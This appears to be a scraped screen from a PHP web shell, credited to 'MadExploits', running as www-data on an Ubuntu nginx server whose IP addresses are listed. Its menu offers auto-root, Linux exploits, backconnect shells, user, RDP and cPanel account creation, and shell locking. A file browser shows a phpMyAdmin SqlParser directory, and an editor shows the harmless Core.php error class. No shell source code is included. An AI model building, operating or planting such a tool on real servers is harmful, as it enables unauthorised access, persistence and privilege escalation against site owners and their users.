Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
PhpMyAdmin /
SqlParser /
[ HOME SHELL ]
Name
Size
Permission
Action
Components
[ DIR ]
drwxr-xr-x
Contexts
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Statements
[ DIR ]
drwxr-xr-x
Tools
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
Component.php
2.05
KB
-rw-r--r--
Context.php
18.84
KB
-rw-r--r--
Core.php
1004
B
-rw-r--r--
Lexer.php
32.97
KB
-rw-r--r--
Parser.php
20.78
KB
-rw-r--r--
Statement.php
17.77
KB
-rw-r--r--
Token.php
9.32
KB
-rw-r--r--
TokensList.php
4.51
KB
-rw-r--r--
Translator.php
1.57
KB
-rw-r--r--
UtfString.php
4.91
KB
-rw-r--r--
autoload.php
8.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Core.php
<?php /** * Defines the core helper infrastructure of the library. */ declare(strict_types=1); namespace PhpMyAdmin\SqlParser; use Exception; class Core { /** * Whether errors should throw exceptions or just be stored. * * @see static::$errors * * @var bool */ public $strict = false; /** * List of errors that occurred during lexing. * * Usually, the lexing does not stop once an error occurred because that * error might be false positive or a partial result (even a bad one) * might be needed. * * @see Core::error() * * @var Exception[] */ public $errors = []; /** * Creates a new error log. * * @param Exception $error the error exception * * @throws Exception throws the exception, if strict mode is enabled. */ public function error($error) { if ($this->strict) { throw $error; } $this->errors[] = $error; } }
Close